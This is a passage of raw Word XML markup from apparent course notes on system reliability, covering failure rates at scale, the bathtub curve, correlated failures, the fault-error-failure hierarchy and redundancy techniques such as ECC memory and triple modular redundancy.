      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The critical insight:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> At scale, every type of failure occurs constantly. Google's data shows that for a cluster of 2,000 machines over a year:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D97019" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="400"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>~5 machines lose a disk per day</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAE234F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="400"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>~1 machine experiences memory corruption per day</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698D5853" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="400"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>~0.5 machines experience a complete failure per day</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E82650E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="400"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Network switches fail monthly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6BC26C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Software failures dominate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100E7849" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Studies across major companies (Microsoft, Google, Amazon) consistently show that software bugs and human operational errors cause more outages than hardware failures. Hardware is well-understood with predictable failure rates. Software complexity creates emergent, unpredictable failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16295433" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.2 The Bathtub Curve — Failure Rate Over Time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8FED89" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Hardware failure rates follow a characteristic pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9885C7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C50D114" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13719F12" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">Rate │  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F02EDD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">     │\        Infant         Useful Life         Wear-out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0142860B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">     │ \       Mortality      (Constant λ)        Period</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701CF87C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">     │  \     ___________                        /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2275987F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">     │   \   /           \                      /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14681149" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">     │    \_/             \____________________/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776BEC7E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025C88DA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">     └──────────────────────────────────────────── Time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FAB60A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="401"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Infant mortality (early failures):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Manufacturing defects, weak components fail quickly. Addressed by burn-in testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572662DE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="401"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Useful life (random failures):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Constant failure rate. Failures are random and unpredictable. This is where your system operates most of its life.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76ABC932" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="401"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Wear-out:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Components degrade. Increasing failure rate. Addressed by proactive replacement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3752683E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>For software, the curve is inverted:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F75EDB5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>Software doesn't wear out — it fails more early (undiscovered bugs hit in production) and after changes (new deployments introduce regressions). The "useful life" period is the most reliable, until the next change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2D3B22" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.3 Correlated vs. Independent Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54423CED" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Independent failures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C282512" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Two servers failing simultaneously by chance. Probability = P(A) × P(B). If each has 99.9% reliability, both failing = 0.001 × 0.001 = 0.000001 (extremely unlikely).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B22D643" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Correlated failures (the real danger):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0282C76C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Multiple components fail from the same root cause:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E29301B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="402"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shared infrastructure:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Power supply failure takes out an entire rack. Network switch failure isolates 40 machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D276CA7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="402"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Software bugs triggered by specific input:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> A malformed request crashes ALL servers processing it (they all run the same code).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C80225A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="402"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cascading failures:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Service A fails → Service B (which depends on A) overloads → Service C (which depends on B) fails → entire system collapse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB2AED0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="402"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Configuration errors:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> A bad config push rolls out to all instances simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E92C6A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="402"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Time-based triggers:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> A certificate expires on all servers at midnight. A leap-second bug hits every instance simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6359C9F4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="402"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Thundering herd:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> System recovers from failure → all cached data expired → all requests hit the database simultaneously → database crashes → system fails again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A5819E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Designing for reliability requires assuming correlated failures will happen</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> and building defenses against them (blast radius reduction, progressive rollouts, diverse implementations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166A3410" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="4DDCE2E7">
          <v:rect id="_x0000_i2932" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="035BFCFE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Fault Tolerance — The Primary Mechanism for Reliability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B055212" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 The Hierarchy: Fault → Error → Failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162A666A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="403"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fault:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> The root cause (a bug in code, a disk sector going bad, a network cable cut).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A7BD4E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="403"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Error:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> The manifestation of a fault in the system state (incorrect value in memory, corrupted packet).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05166083" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="403"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Failure:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> The system deviates from correct behavior as observed by the user (wrong response, timeout, data loss).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468128C7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fault tolerance means:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> The system experiences faults and errors, but does NOT exhibit failure to the user. The system masks internal problems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6406340E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 Redundancy Types for Fault Tolerance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D07EE27" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Information Redundancy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14482BAE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Adding extra information to detect/correct errors in data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC08010" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="404"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Parity bits:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> One extra bit detects single-bit errors. Used in RAM (ECC memory).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FDB517" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="404"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Checksums (CRC, MD5, SHA):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Detect data corruption in transit or storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E18ED93" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="404"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Error-Correcting Codes (ECC):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Not only detect but CORRECT errors without retransmission. Hamming codes correct 1-bit errors. Reed-Solomon codes correct multi-bit errors (used in CDs, QR codes, distributed storage).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5EFF6A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How ECC memory works internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30794546" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="405"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>For every 64 bits of data, 8 additional ECC bits are stored (72 bits total per word).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37635803" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="405"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>On every read, the memory controller recalculates the expected ECC from the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79342CCC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="405"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Compares calculated ECC to stored ECC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A799C6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="405"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If they match → data is correct.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C330F2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="405"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If single-bit difference → identifies and corrects the flipped bit automatically. (The system continues without any disruption.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C39A2F5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="405"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If multi-bit difference → detects but cannot correct. Raises an uncorrectable error (machine check exception).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2D7256" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>At Google's scale:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> They observed ~1 correctable ECC error per GB of RAM per year. Without ECC, these would be silent data corruption — the most insidious reliability failure because it's undetected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C882536" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Time Redundancy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E084588" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Performing an operation multiple times and comparing results:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E606619" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="406"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Retries:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> If a network call fails, try again. The transient fault may not recur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733991F0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="406"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>N-version computation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Run the same computation N times (possibly on different hardware) and vote on the result. Used in aerospace systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A0A19F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="406"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Checkpoint and replay:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> If a long computation fails midway, restart from the last checkpoint rather than from the beginning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676506EF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spatial/Hardware Redundancy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C7E52E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Using multiple physical components:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AFE4D5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="407"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TMR (Triple Modular Redundancy):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Three identical systems process the same input. A voter selects the majority output. If one system fails, the other two still agree. Used in aircraft flight computers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEAB864" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="407"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Active replication:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Multiple replicas process every request. First response is used, others are discarded (latency optimization + reliability).</w:t>
      </w:r>
    </w:p>
